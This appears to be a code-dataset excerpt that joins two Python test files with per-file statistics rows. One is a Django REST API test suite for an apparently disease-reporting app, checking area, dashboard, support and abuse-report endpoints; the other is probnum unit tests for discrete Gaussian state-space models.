# self.assertEqual(area4['parentName'], '')
# self.assertEqual(area4['isLeaf'], True)
area5 = response_json[2]
self.assertEqual(area5['id'], self.area2.id)
self.assertEqual(area5['name'], self.area2.name)
self.assertEqual(area5['address'], self.area2.address)
# self.assertEqual(area5['parentName'], '')
# self.assertEqual(area5['isLeaf'], False)
def test_api_list_administration_area_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
response = self.client.get(reverse('administrationarea-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 3)
def test_api_list_administration_area_only_has_permission_on_those_administration_areas(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
response = self.client.get(reverse('administrationarea-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 1)
area1 = response_json[0]
self.assertEqual(area1['id'], self.area1.id)
self.assertEqual(area1['name'], self.area1.name)
self.assertEqual(area1['address'], self.area1.address)
# self.assertEqual(area1['parentName'], '')
def test_api_list_administration_area_only_group_has_role_reporter(self):
group_a = factory.add_user_to_new_group(user=self.taeyeon,
type=GROUP_WORKING_TYPE_ALERT_REPORT_ADMINSTRATION_AREA)
area = factory.create_administration_area()
factory.create_group_administration_area(group=group_a, administration_area=area)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('administrationarea-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 3)
def test_api_list_administration_area_return_empty_list_if_not_have_any_permission(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('administrationarea-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 0)
def test_staff_can_get_all_api_list_administration_area(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.minah.auth_token.key)
response = self.client.get(reverse('administrationarea-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 5)
def test_anonymous_cannot_access_api_list_administration_area(self):
response = self.client.get(reverse('administrationarea-list'))
self.assertEqual(response.status_code, 401)
class TestApiAdministrationArea(APITestCase):
def setUp(self):
try:
ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
ReportType.objects.create(
id=0,
name='Positive Report Type',
form_definition='{}',
version=0,
)
self.taeyeon = factory.create_user()
self.jessica = factory.create_user()
self.yoona = factory.create_user(is_staff=True, is_superuser=True)
self.krystal = factory.create_user()
self.authority = factory.create_authority()
self.authority.users.add(self.taeyeon)
self.authority.users.add(self.krystal)
self.area1 = factory.create_administration_area(authority=self.authority)
self.area2 = factory.create_administration_area(authority=self.authority)
def test_api_get_administration_area(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('administrationarea-detail', args=[self.area1.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['id'], self.area1.id)
self.assertEqual(response_json['name'], self.area1.name)
self.assertEqual(response_json['address'], self.area1.address)
def test_api_get_administration_area_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
response = self.client.get(reverse('administrationarea-detail', args=[self.area1.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['id'], self.area1.id)
self.assertEqual(response_json['name'], self.area1.name)
self.assertEqual(response_json['address'], self.area1.address)
'''
def test_api_get_administration_area_that_is_child_of_area_that_has_permission(self):
area = self.area1.add_child(name='Namsan', location=self.area1.location)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('administrationarea-detail', args=[area.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['id'], area.id)
self.assertEqual(response_json['name'], area.name)
self.assertEqual(response_json['address'], area.address)
def test_api_get_administration_area_that_is_child_of_area_that_has_permission_with_authority(self):
area = self.area1.add_child(name='Namsan', location=self.area1.location)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
response = self.client.get(reverse('administrationarea-detail', args=[area.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['id'], area.id)
self.assertEqual(response_json['name'], area.name)
self.assertEqual(response_json['address'], area.address)
'''
def test_cannot_get_api_get_administration_area_if_user_dont_have_authorized(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
response = self.client.get(reverse('administrationarea-detail', args=[self.area1.id]))
self.assertEqual(response.status_code, 403)
def test_cannot_get_api_get_administration_area_if_group_is_not_has_role_reporter(self):
group_a = factory.add_user_to_new_group(user=self.taeyeon,
type=GROUP_WORKING_TYPE_ALERT_REPORT_ADMINSTRATION_AREA)
area = factory.create_administration_area()
factory.create_group_administration_area(group=group_a, administration_area=area)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('administrationarea-detail', args=[area.id]))
self.assertEqual(response.status_code, 403)
def test_cannot_get_api_get_administration_area_if_not_exists(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
response = self.client.get(reverse('administrationarea-detail', args=[self.area1.id+100]))
self.assertEqual(response.status_code, 404)
def test_staff_can_get_api_get_administration_area(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('administrationarea-detail', args=[self.area1.id]))
self.assertEqual(response.status_code, 200)
def test_anonymous_cannot_access_api_get_administration_area(self):
response = self.client.get(reverse('administrationarea-detail', args=[self.area1.id]))
self.assertEqual(response.status_code, 401)
class TestApiDashboard(APITestCase):
def setUp(self):
try:
ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
ReportType.objects.create(
id=0,
name='Positive Report Type',
form_definition='{}',
version=0,
)
call_command('clear_index', interactive=False, verbosity=0)
call_command('clear_graph', interactive=False, verbosity=0)
self.taeyeon = factory.create_user()
self.jessica = factory.create_user()
self.yoona = factory.create_user(is_staff=True)
self.krystal = factory.create_user()
self.authority = factory.create_authority()
self.authority.users.add(self.taeyeon)
self.authority.users.add(self.krystal)
self.authority_1 = factory.create_authority()
self.authority_1.users.add(self.jessica)
self.type = factory.create_report_type(authority=self.authority)
self.area1 = factory.create_administration_area(authority=self.authority)
self.area2 = factory.create_administration_area(authority=self.authority_1)
self.authority_1.inherits.add(self.authority)
self.report1 = factory.create_report(type=self.type, administration_area=self.area1, negative=True)
self.report2 = factory.create_report(type=self.type, administration_area=self.area1, negative=False)
self.report3 = factory.create_report(type=self.type, administration_area=self.area2, negative=True)
def test_get_api_dashboard_with_staff_user(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('dashboard_villages'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 2)
response_json = order_list_by_id(response_json)
area1 = response_json[0]
self.assertEqual(area1['id'], self.area1.id)
self.assertEqual(area1['name'], self.area1.name)
self.assertEqual(area1['positive'], 1)
self.assertEqual(area1['negative'], 1)
area2 = response_json[1
]
self.assertEqual(area2['id'], self.area2.id)
self.assertEqual(area2['name'], self.area2.name)
self.assertEqual(area2['positive'], 0)
self.assertEqual(area2['negative'], 1)
def test_get_api_dashboard_with_full_access_user(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('dashboard_villages'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 2)
area1 = response_json[0]
self.assertEqual(area1['id'], self.area1.id)
self.assertEqual(area1['name'], self.area1.name)
self.assertEqual(area1['positive'], 1)
self.assertEqual(area1['negative'], 1)
area2 = response_json[1]
self.assertEqual(area2['id'], self.area2.id)
self.assertEqual(area2['name'], self.area2.name)
self.assertEqual(area2['positive'], 0)
self.assertEqual(area2['negative'], 1)
def test_get_api_dashboard_with_full_access_user_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
response = self.client.get(reverse('dashboard_villages'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 1)
area1 = response_json[0]
self.assertEqual(area1['id'], self.area2.id)
self.assertEqual(area1['name'], self.area2.name)
self.assertEqual(area1['positive'], 0)
self.assertEqual(area1['negative'], 1)
def test_get_api_dashboard_with_some_access_user(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
response = self.client.get(reverse('dashboard_villages'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 1)
area1 = response_json[0]
self.assertEqual(area1['id'], self.area2.id)
self.assertEqual(area1['name'], self.area2.name)
self.assertEqual(area1['positive'], 0)
self.assertEqual(area1['negative'], 1)
'''
def test_get_api_dashboard_always_include_report_type_0(self):
try:
default_positive_type = ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
default_positive_type = ReportType.objects.create(id=0, code='positive-report', name='positive report')
factory.create_report(type=default_positive_type, administration_area=self.area1, negative=False)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('dashboard_villages'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 2)
area1 = response_json[0]
self.assertEqual(area1['id'], self.area1.id)
self.assertEqual(area1['name'], self.area1.name)
self.assertEqual(area1['address'], self.area1.address)
self.assertEqual(area1['positive'], 2)
self.assertEqual(area1['negative'], 1)
area2 = response_json[1]
self.assertEqual(area2['id'], self.area2.id)
self.assertEqual(area2['name'], self.area2.name)
self.assertEqual(area2['address'], self.area2.address)
self.assertEqual(area2['positive'], 0)
self.assertEqual(area2['negative'], 1)
def test_get_api_dashboard_always_include_report_type_0_with_authority(self):
try:
default_positive_type = ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
default_positive_type = ReportType.objects.create(id=0, code='positive-report', name='positive report')
factory.create_report(type=default_positive_type, administration_area=self.area1, negative=False)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
response = self.client.get(reverse('dashboard_villages'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 1)
area1 = response_json[0]
self.assertEqual(area1['id'], self.area1.id)
self.assertEqual(area1['name'], self.area1.name)
self.assertEqual(area1['address'], self.area1.address)
self.assertEqual(area1['positive'], 2)
self.assertEqual(area1['negative'], 1)
'''
'''
@patch('django_redis.get_redis_connection', mock_strict_redis_client)
class TestApiReportSummaryByMonth(APITestCase):
def setUp(self):
try:
ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
ReportType.objects.create(
id=0,
name='Positive Report Type',
form_definition='{}',
version=0,
)
call_command('clear_index', interactive=False, verbosity=0)
self.taeyeon = factory.create_user(username='taeyeon')
self.jessica = factory.create_user(username='jessica')
self.yoona = factory.create_user(username='yoona')
self.authority = factory.create_authority()
self.authority.users.add(self.yoona)
self.group_a = factory.add_user_to_new_group_type_administration_area(user=self.taeyeon)
self.group_r = factory.add_user_to_new_group_type_report_type(user=self.taeyeon)
self.type1 = factory.create_report_type()
self.type2 = factory.create_report_type()
self.type3 = factory.create_report_type()
factory.create_group_report_type(group=self.group_r, report_type=self.type1)
factory.create_group_report_type(group=self.group_r, report_type=self.type2)
self.authority.report_types.add(self.type1)
self.authority.report_types.add(self.type2)
self.area1 = factory.create_administration_area()
self.area2 = factory.create_administration_area()
self.area3 = factory.create_administration_area()
factory.create_group_administration_area(group=self.group_a, administration_area=self.area1)
factory.create_group_administration_area(group=self.group_a, administration_area=self.area2)
self.authority.administration_areas.add(self.area1)
self.authority.administration_areas.add(self.area2)
self.report1 = factory.create_report(created_by=self.taeyeon, type=self.type2,
administration_area=self.area2, incident_date=datetime.date(2014, 11, 14), negative=True)
self.report2 = factory.create_report(created_by=self.taeyeon, type=self.type1,
administration_area=self.area1, incident_date=datetime.date(2014, 11, 14), negative=False)
self.report3 = factory.create_report(created_by=self.jessica, type=self.type1,
administration_area=self.area2, incident_date=datetime.date(2014, 11, 27), negative=True)
self.report4 = factory.create_report(created_by=self.taeyeon, type=self.type3,
administration_area=self.area2, incident_date=datetime.date(2014, 11, 14), negative=True)
self.report5 = factory.create_report(created_by=self.taeyeon, type=self.type1,
administration_area=self.area3, incident_date=datetime.date(2014, 11, 3), negative=False)
def test_api_report_summary_by_month(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {'month': '11/2014'}
response = self.client.get(reverse('reports_summary_by_month'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 3)
user1 = response_json[0]
self.assertEqual(user1['fullname'], self.jessica.get_full_name())
self.assertEqual(user1['dates'][26]['date'], '27-11-2014')
self.assertEqual(user1['dates'][26]['positive'], 0)
self.assertEqual(user1['dates'][26]['negative'], 1)
self.assertEqual(user1['dates'][26]['total'], 1)
user2 = response_json[1]
self.assertEqual(user2['fullname'], self.taeyeon.get_full_name())
self.assertEqual(user2['dates'][2]['date'], '03-11-2014')
self.assertEqual(user2['dates'][2]['positive'], 1)
self.assertEqual(user2['dates'][2]['negative'], 0)
self.assertEqual(user2['dates'][2]['total'], 1)
self.assertEqual(user2['dates'][13]['date'], '14-11-2014')
self.assertEqual(user2['dates'][13]['positive'], 1)
self.assertEqual(user2['dates'][13]['negative'], 2)
self.assertEqual(user2['dates'][13]['total'], 3)
user3 = response_json[2]
self.assertEqual(user3['fullname'], self.yoona.get_full_name())
def test_api_report_summary_by_month_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
params = {'month': '11/2014'}
response = self.client.get(reverse('reports_summary_by_month'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 3)
user1 = response_json[0]
self.assertEqual(user1['fullname'], self.jessica.get_full_name())
self.assertEqual(user1['dates'][26]['date'], '27-11-2014')
self.assertEqual(user1['dates'][26]['positive'], 0)
self.assertEqual(user1['dates'][26]['negative'], 1)
self.assertEqual(user1['dates'][26]['total'], 1)
user2 = response_json[1]
self.assertEqual(user2['fullname'], self.taeyeon.get_full_name())
self.assertEqual(user2['dates'][2]['date'], '03-11-2014')
self.assertEqual(user2['dates'][2]['positive'], 1)
self.assertEqual(user2['dates'][2]['negative'], 0)
self.assertEqual(user2['dates'][2]['total'], 1)
self.assertEqual(user2['dates'][13]['date'], '14-11-2014')
self.assertEqual(user2['dates'][13]['positive'], 1)
self.assertEqual(user2['dates'][13]['negative'], 2)
self.assertEqual(user2['dates'][13]['total'], 3)
user3 = response_json[2]
self.assertEqual(user3['fullname'], self.yoona.get_full_name())
def test_api_report_summary_by_month_invalid(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('reports_summary_by_month'))
self.assertEqual(response.status_code, 400)
response_json = json.loads(response.content)
self.assertEqual(response_json['month'], 'Invalid month. Please try again. (eg. 3/2014)')
def test_anonymous_cannot_access_api_report_summary_by_month(self):
response = self.client.get(reverse('reports_summary_by_month'))
self.assertEqual(response.status_code, 401)
'''
class TestApiSupport(APITestCase):
def setUp(self):
common_public_setup(self)
def test_action(self):
user1 = factory.create_user(display_password='password', status=USER_STATUS_ADDITION_VOLUNTEER, is_anonymous=False,
is_public=True)
user2 = factory.create_user(display_password='password', status=USER_STATUS_ADDITION_VOLUNTEER, is_anonymous=False,
is_public=True)
report1 = factory.create_report(type=self.report_type, created_by=self.user)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + user1.auth_token.key)
params = {
'reportGuid': report1.guid,
'message': 'Hello World 1',
'isLike': True,
'isMeToo': True
}
response = self.client.post(reverse('report_add_support'), params)
notifications = Notification.objects.filter(created_by=user1, receive_user=self.user).order_by('-id')
self.assertEqual(notifications.count(), 1)
self.assertEqual(notifications[0].type, SUPPORT_LIKE_ME_TOO_COMMENT)
params = {
'reportGuid': report1.guid,
'message': ' ',
'isLike': True,
'isMeToo': True
}
response = self.client.post(reverse('report_add_support'), params)
self.assertEqual(notifications.count(), 1)
self.assertEqual(notifications[0].type, SUPPORT_LIKE_ME_TOO_COMMENT)
params = {
'reportGuid': report1.guid,
'message': 'Hello World 2',
'isLike': True,
'isMeToo': True
}
response = self.client.post(reverse('report_add_support'), params)
self.assertEqual(notifications.count(), 2)
self.assertEqual(notifications[0].type, SUPPORT_COMMENT)
params = {
'reportGuid': report1.guid,
'message': '',
'isLike': False,
'isMeToo': False
}
response = self.client.post(reverse('report_add_support'), params)
self.assertEqual(notifications.count(), 2)
self.assertEqual(notifications[0].type, SUPPORT_COMMENT)
params = {
'reportGuid': report1.guid,
'message': '',
'isLike': True,
'isMeToo': True
}
response = self.client.post(reverse('report_add_support'), params)
self.assertEqual(notifications.count(), 2)
self.assertEqual(notifications[0].type, SUPPORT_COMMENT)
report2 = factory.create_report(type=self.report_type, created_by=self.user)
params = {
'reportGuid': report2.guid,
'message': '',
'isLike': True,
'isMeToo': False
}
response = self.client.post(reverse('report_add_support'), params)
notifications = Notification.objects.filter(created_by=user1, receive_user=self.user).order_by('-id')
self.assertEqual(notifications.count(), 3)
self.assertEqual(notifications[0].type, SUPPORT_LIKE)
report3 = factory.create_report(type=self.report_type, created_by=self.user)
params = {
'reportGuid': report3.guid,
'message': '',
'isLike': False,
'isMeToo': True
}
response = self.client.post(reverse('report_add_support'), params)
notifications = Notification.objects.filter(created_by=user1, receive_user=self.user).order_by('-id')
self.assertEqual(notifications.count(), 4)
self.assertEqual(notifications[0].type, SUPPORT_ME_TOO)
report4 = factory.create_report(type=self.report_type, created_by=self.user)
params = {
'reportGuid': report4.guid,
'message': '',
'isLike': True,
'isMeToo': True
}
response = self.client.post(reverse('report_add_support'), params)
notifications = Notification.objects.filter(created_by=user1, receive_user=self.user).order_by('-id')
self.assertEqual(notifications.count(), 5)
self.assertEqual(notifications[0].type, SUPPORT_LIKE_ME_TOO)
class TestApiReportReportAbuse(APITestCase):
def setUp(self):
try:
ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
ReportType.objects.create(
id=0,
name='Positive Report Type',
form_definition='{}',
version=0,
)
call_command('clear_index', interactive=False, verbosity=0)
self.taeyeon = factory.create_user()
self.jessica = factory.create_user()
self.yoona = factory.create_user()
self.krystal = factory.create_user(is_anonymous=True)
self.authority = factory.create_authority()
self.authority.users.add(self.taeyeon)
self.authority.users.add(self.jessica)
self.authority.users.add(self.yoona)
self.authority.users.add(self.krystal)
self.type = factory.create_report_type(authority=self.authority)
self.area = factory.create_administration_area(authority=self.authority)
self.report1 = factory.create_report(created_by=self.taeyeon, type=self.type,
administration_area=self.area)
self.report2 = factory.create_report(created_by=self.jessica, type=self.type,
administration_area=self.area)
def test_post_create_report_report_abuse(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
"reason": "No reason",
}
response = self.client.post(reverse('report-reportAbuse', args=[self.report2.id]), params)
self.assertEqual(response.status_code, 201)
response_json = json.loads(response.content)
self.assertEqual(response_json['reportId'], self.report2.id)
self.assertEqual(response_json['reason'], 'No reason')
report_abuse = ReportAbuse.objects.latest('id')
self.assertEqual(report_abuse.report, self.report2)
self.assertEqual(report_abuse.reason, 'No reason')
self.assertEqual(report_abuse.created_by, self.taeyeon)
def test_post_create_report_report_abuse_with_multi_users(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.jessica.auth_token.key)
params = {
"reason": "No reason, It's me",
}
response = self.client.post(reverse('report-reportAbuse', args=[self.report1.id]), params)
self.assertEqual(response.status_code, 201)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
params = {
"reason": "No reason, :P",
}
response = self.client.post(reverse('report-reportAbuse', args=[self.report1.id]), params)
self.assertEqual(response.status_code, 201)
response = self.client.get(reverse('report-reportAbuses', args=[self.report1.id]))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(len(response_json), 2)
# user1 = response_json[0]
# self.assertEqual(user1['id'], self.jessica.id)
# self.assertEqual(user1['firstName'], self.jessica.first_name)
#
# user2 = response_json[1]
# self.assertEqual(user2['id'], self.yoona.id)
# self.assertEqual(user2['firstName'], self.yoona.first_name)
def test_post_create_report_report_abuse_without_reason(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.post(reverse('report-reportAbuse', args=[self.report2.id]))
self.assertEqual(response.status_code, 400)
def test_post_api_report_report_abuse_wih_anonymous_by_report(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.krystal.auth_token.key)
params = {
"reason": "No reason, :P",
}
response = self.client.post(reverse('report-reportAbuse', args=[self.report1.id]), params)
self.assertEqual(response.status_code, 400)
def test_post_api_report_report_abuse_no_token(self):
params = {
"reason": "No reason, :P",
}
response = self.client.post(reverse('report-reportAbuse', args=[self.report1.id]), params)
self.assertEqual(response.status_code, 401)
| 45.642505
| 140
| 0.670311
| 25,711
| 222,279
| 5.605733
| 0.020225
| 0.1252
| 0.083939
| 0.051329
| 0.97122
| 0.961042
| 0.949358
| 0.939179
| 0.934344
| 0.925553
| 0
| 0.029833
| 0.203011
| 222,279
| 4,869
| 141
| 45.651879
| 0.783623
| 0.013236
| 0
| 0.834479
| 0
| 0.002091
| 0.102415
| 0.009616
| 0
| 0
| 0
| 0
| 0.312519
| 1
| 0.068121
| false
| 0.000598
| 0.006573
| 0.002689
| 0.08545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
c9cd462ea77ed2bb613903e28e14369c07888c81
| 5,928
|
py
|
Python
|
tests/test_filtsmooth/test_statespace/test_discrete/test_discretegaussianmodel.py
|
coldfix/probnum
|
9b93d822c8d6501f9a12a783da84867ea54e6f6c
|
[
"MIT"
] | null | null | null |
tests/test_filtsmooth/test_statespace/test_discrete/test_discretegaussianmodel.py
|
coldfix/probnum
|
9b93d822c8d6501f9a12a783da84867ea54e6f6c
|
[
"MIT"
] | null | null | null |
tests/test_filtsmooth/test_statespace/test_discrete/test_discretegaussianmodel.py
|
coldfix/probnum
|
9b93d822c8d6501f9a12a783da84867ea54e6f6c
|
[
"MIT"
] | null | null | null |
"""
"""
import unittest
import numpy as np
from probnum.filtsmooth.statespace.discrete import discretegaussianmodel
TEST_NDIM = 4
class TestDiscreteGaussianModel(unittest.TestCase):
"""
"""
def setUp(self):
"""
"""
dynamat = np.random.rand(TEST_NDIM, TEST_NDIM)
diffmat = dynamat @ dynamat.T + np.eye(TEST_NDIM)
self.nl = discretegaussianmodel.DiscreteGaussianModel(
lambda t, x: dynamat @ x, lambda t: diffmat
)
def test_dynamics(self):
"""
"""
some_input = np.random.rand(TEST_NDIM)
val = self.nl.dynamics(0.0, some_input)
self.assertEqual(val.ndim, 1)
self.assertEqual(val.shape[0], TEST_NDIM)
def test_diffusionmatrix(self):
"""
"""
val = self.nl.diffusionmatrix(0.0)
self.assertEqual(val.ndim, 2)
self.assertEqual(val.shape[0], TEST_NDIM)
self.assertEqual(val.shape[1], TEST_NDIM)
def test_jacobian(self):
"""
"""
some_input = np.random.rand(TEST_NDIM)
with self.assertRaises(NotImplementedError):
self.nl.jacobian(0.0, some_input)
def test_sample(self):
"""
"""
some_input = np.random.rand(TEST_NDIM)
samp = self.nl.sample(0.0, some_input)
self.assertEqual(samp.ndim, 1)
self.assertEqual(samp.shape[0], TEST_NDIM)
def test_ndim(self):
"""
"""
self.assertEqual(self.nl.ndim, TEST_NDIM)
def test_pdf(self):
"""
"""
some_state = np.random.rand(TEST_NDIM)
evl = self.nl.pdf(some_state, 0.0, some_state)
self.assertEqual(np.isscalar(evl), True)
class TestLinear(unittest.TestCase):
"""
"""
def setUp(self):
"""
"""
dynamat = np.random.rand(TEST_NDIM, TEST_NDIM)
diffmat = dynamat @ dynamat.T + np.eye(TEST_NDIM)
self.lin = discretegaussianmodel.DiscreteGaussianLinearModel(
lambda t: dynamat, lambda t: np.random.rand(TEST_NDIM), lambda t: diffmat
)
def test_dynamics(self):
"""
"""
some_input = np.random.rand(TEST_NDIM)
val = self.lin.dynamics(0.0, some_input)
self.assertEqual(val.ndim, 1)
self.assertEqual(val.shape[0], TEST_NDIM)
def test_diffusionmatrix(self):
"""
"""
val = self.lin.diffusionmatrix(0.0)
self.assertEqual(val.ndim, 2)
self.assertEqual(val.shape[0], TEST_NDIM)
self.assertEqual(val.shape[1], TEST_NDIM)
def test_jacobian(self):
"""
"""
some_input = np.random.rand(TEST_NDIM)
jac = self.lin.jacobian(0.0, some_input)
self.assertEqual(jac.ndim, 2)
self.assertEqual(jac.shape[0], TEST_NDIM)
self.assertEqual(jac.shape[1], TEST_NDIM)
def test_dynamicsmatrix(self):
"""
"""
dyna = self.lin.dynamicsmatrix(0.0)
self.assertEqual(dyna.ndim, 2)
self.assertEqual(dyna.shape[0], TEST_NDIM)
self.assertEqual(dyna.shape[1], TEST_NDIM)
def test_force(self):
"""
"""
force = self.lin.force(0.0)
self.assertEqual(force.ndim, 1)
self.assertEqual(force.shape[0], TEST_NDIM)
def test_sample(self):
"""
"""
some_input = np.random.rand(TEST_NDIM)
samp = self.lin.sample(0.0, some_input)
self.assertEqual(samp.ndim, 1)
self.assertEqual(samp.shape[0], TEST_NDIM)
def test_ndim(self):
"""
"""
self.assertEqual(self.lin.ndim, TEST_NDIM)
def test_pdf(self):
"""
"""
some_state = np.random.rand(TEST_NDIM)
evl = self.lin.pdf(some_state, 0.0, some_state)
self.assertEqual(np.isscalar(evl), True)
class TestLTI(unittest.TestCase):
"""
"""
def setUp(self):
"""
"""
dynamat = np.random.rand(TEST_NDIM, TEST_NDIM)
diffmat = dynamat @ dynamat.T + np.eye(TEST_NDIM)
self.lti = discretegaussianmodel.DiscreteGaussianLTIModel(
dynamat, dynamat[0], diffmat
)
def test_dynamics(self):
"""
"""
some_input = np.random.rand(TEST_NDIM)
val = self.lti.dynamics(0.0, some_input)
self.assertEqual(val.ndim, 1)
self.assertEqual(val.shape[0], TEST_NDIM)
def test_dynamicsmatrix(self):
"""
"""
some_input = np.random.rand(TEST_NDIM)
dyna = self.lti.dynamicsmatrix(0.0)
self.assertEqual(dyna.ndim, 2)
self.assertEqual(dyna.shape[0], TEST_NDIM)
self.assertEqual(dyna.shape[1], TEST_NDIM)
def test_diffusionmatrix(self):
"""
"""
val = self.lti.diffusionmatrix(0.0)
self.assertEqual(val.ndim, 2)
self.assertEqual(val.shape[0], TEST_NDIM)
self.assertEqual(val.shape[1], TEST_NDIM)
def test_jacobian(self):
"""
"""
some_input = np.random.rand(TEST_NDIM)
jac = self.lti.jacobian(0.0, some_input)
self.assertEqual(jac.ndim, 2)
self.assertEqual(jac.shape[0], TEST_NDIM)
self.assertEqual(jac.shape[1], TEST_NDIM)
def test_force(self):
"""
"""
force = self.lti.force(0.0)
self.assertEqual(force.ndim, 1)
self.assertEqual(force.shape[0], TEST_NDIM)
def test_sample(self):
"""
"""
some_input = np.random.rand(TEST_NDIM)
samp = self.lti.sample(0.0, some_input)
self.assertEqual(samp.ndim, 1)
self.assertEqual(samp.shape[0], TEST_NDIM)
def test_ndim(self):
"""
"""
self.assertEqual(self.lti.ndim, TEST_NDIM)
def test_pdf(self):
"""
"""
some_state = np.random.rand(TEST_NDIM)
evl = self.lti.pdf(some_state, 0.0, some_state)
self.assertEqual(np.isscalar(evl), True)
| 27.192661
| 85
| 0.578947
| 716
| 5,928
| 4.655028
| 0.083799
| 0.124812
| 0.059406
| 0.081008
| 0.860486
| 0.848785
| 0.839184
| 0.839184
| 0.821482
| 0.821482
| 0
| 0.018186
| 0.285762
| 5,928
| 217
| 86
| 27.317972
| 0.769013
| 0
| 0
| 0.682927
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.357724
| 1
| 0.203252
| false
| 0
| 0.02439
| 0
| 0.252033
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a007b401c8e05e4c43cba162b029370e0c390db6
| 75
|
py
|
Python
|
modules/ckanext-ytp_main/ckanext/ytp/celery_import.py
|
eetumans/opendata
|
061f58550bcb820016a764cca4763ed0a5f627fe
|
[
"MIT"
] | 16
|
2018-07-12T14:26:02.000Z
|
2022-02-24T12:10:00.000Z
|
modules/ckanext-ytp_main/ckanext/ytp/celery_import.py
|
eetumans/opendata
|
061f58550bcb820016a764cca4763ed0a5f627fe
|
[
"MIT"
] | 751
|
2017-09-28T07:47:50.000Z
|
2022-03-31T12:08:25.000Z
|
modules/ckanext-ytp_main/ckanext/ytp/celery_import.py
|
vrk-kpa/opendata-ckan
|
8936e2d9e700b9e5534fe2a51eedc2d1ede8c10b
|
[
"MIT"
] | 6
|
2017-10-31T07:47:07.000Z
|
